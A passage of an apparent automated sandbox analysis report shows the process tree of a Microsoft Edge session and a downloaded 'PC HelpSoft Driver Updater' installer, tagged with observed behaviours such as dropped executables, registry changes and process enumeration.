  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
  2⤵
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
  2⤵
  PID:2744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
  2⤵
  PID:5372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:1
  2⤵
  PID:4284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:64
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
  2⤵
  PID:4748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8168 /prefetch:1
  2⤵
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7576 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8044 /prefetch:1
  2⤵
  PID:324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
  2⤵
  PID:2524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7740 /prefetch:1
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7892 /prefetch:1
  2⤵
  PID:5132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7484 /prefetch:1
  2⤵
  PID:5796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8580 /prefetch:1
  2⤵
  PID:4584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8616 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8736 /prefetch:1
  2⤵
  PID:2520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8864 /prefetch:1
  2⤵
  PID:2564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8996 /prefetch:1
  2⤵
  PID:5032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1
  2⤵
  PID:6284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9552 /prefetch:1
  2⤵
  PID:6388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9880 /prefetch:1
  2⤵
  PID:6484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8632 /prefetch:1
  2⤵
  PID:6952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8880 /prefetch:1
  2⤵
  PID:6960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7420 /prefetch:1
  2⤵
  PID:6968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10112 /prefetch:1
  2⤵
  PID:6732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
  2⤵
  PID:6564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
  2⤵
  PID:6692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9080 /prefetch:1
  2⤵
  PID:4684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
  2⤵
  PID:6192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9388 /prefetch:1
  2⤵
  PID:6208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
  2⤵
  PID:1896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8220 /prefetch:1
  2⤵
  PID:2240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8032 /prefetch:1
  2⤵
  PID:4316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8980 /prefetch:1
  2⤵
  PID:4780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10044 /prefetch:1
  2⤵
  PID:1948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8996 /prefetch:1
  2⤵
  PID:6392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7724 /prefetch:1
  2⤵
  PID:3972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8928 /prefetch:1
  2⤵
  PID:6328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9400 /prefetch:1
  2⤵
  PID:6508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7548 /prefetch:1
  2⤵
  PID:5568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7212 /prefetch:1
  2⤵
  PID:2624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9788 /prefetch:1
  2⤵
  PID:3880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
  2⤵
  PID:6996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9264 /prefetch:1
  2⤵
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
  2⤵
  PID:6676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2080 /prefetch:1
  2⤵
  PID:1168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=9596 /prefetch:8
  2⤵
  PID:2268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10328 /prefetch:8
  2⤵
  PID:1128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10332 /prefetch:8
  2⤵
  PID:6172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9708 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6896
- C:\Users\Admin\Downloads\Driver_Updater_setup.exe
  "C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5956
- - C:\Users\Admin\AppData\Local\Temp\is-BCPKK.tmp\Driver_Updater_setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-BCPKK.tmp\Driver_Updater_setup.tmp" /SL5="$1401C8,5854474,811008,C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3972
- C:\Users\Admin\Downloads\Driver_Updater_setup.exe
  "C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4156
- - C:\Users\Admin\AppData\Local\Temp\is-4LCAM.tmp\Driver_Updater_setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-4LCAM.tmp\Driver_Updater_setup.tmp" /SL5="$501DC,5854474,811008,C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4448
- C:\Users\Admin\Downloads\Driver_Updater_setup.exe
  "C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1896
- - C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp" /SL5="$3022A,5854474,811008,C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:4436
  - - C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe
      "C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe" /INSTALL
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1036
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Delete /TN "PC HelpSoft Driver Updater Schedule" /F
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6976
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Delete /TN "PC HelpSoft Driver Updater Monitoring" /F
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5552
  - - C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe
      "C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe" /START /INSTALLED
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks system information in the registry
      Drops file in System32 directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Checks SCSI registry key(s)
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      PID:6720
    - - C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe
        
        "C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe" /TRAY
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SendNotifyMessage
        
        PID:3316
    - - C:\Users\Admin\AppData\Local\Temp\tmpCC1B.tmp_collect\PCHelpSoftDriverUpdater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpCC1B.tmp_collect\PCHelpSoftDriverUpdater.exe" /COLLECT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1036
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://store.pchelpsoft.com/clickgate/join.aspx?ref=pchelpsoft.com&ujid=n4l4AdUDqyE%3D&uid=1020464&cmp=ADWORDS&mkey1=PH_DU_ESC_WORLD_PP_GO_CO&key1=_&key2=__Device_Bluetooth&gclid=EAIaIQobChMI8M6O1_LSiQMVwkgdCR1NEyMVEAEYASAAEgIiufD_BwE&msclkid=&src=&wID=&affcookiename=&mkey5=offers.pchelpsoft.com/driver_updater/&HostBrowser=ED&software=offers-driverupdater&mkey4=ecdf697f-d5c5-ba12-78b4-1f1dfa421561&visitorid=ecdf697f-d5c5-ba12-78b4-1f1dfa421561&mkey3=win_cta1&mkey6=0&mkey7=NO_TRIAL&mkey8=4
        5⤵
        
        PID:440
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x148,0x14c,0x150,0x12c,0x154,0x7ffdd6ed46f8,0x7ffdd6ed4708,0x7ffdd6ed4718
        6⤵
        
        PID:64
  - - C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe
      "C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:6988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
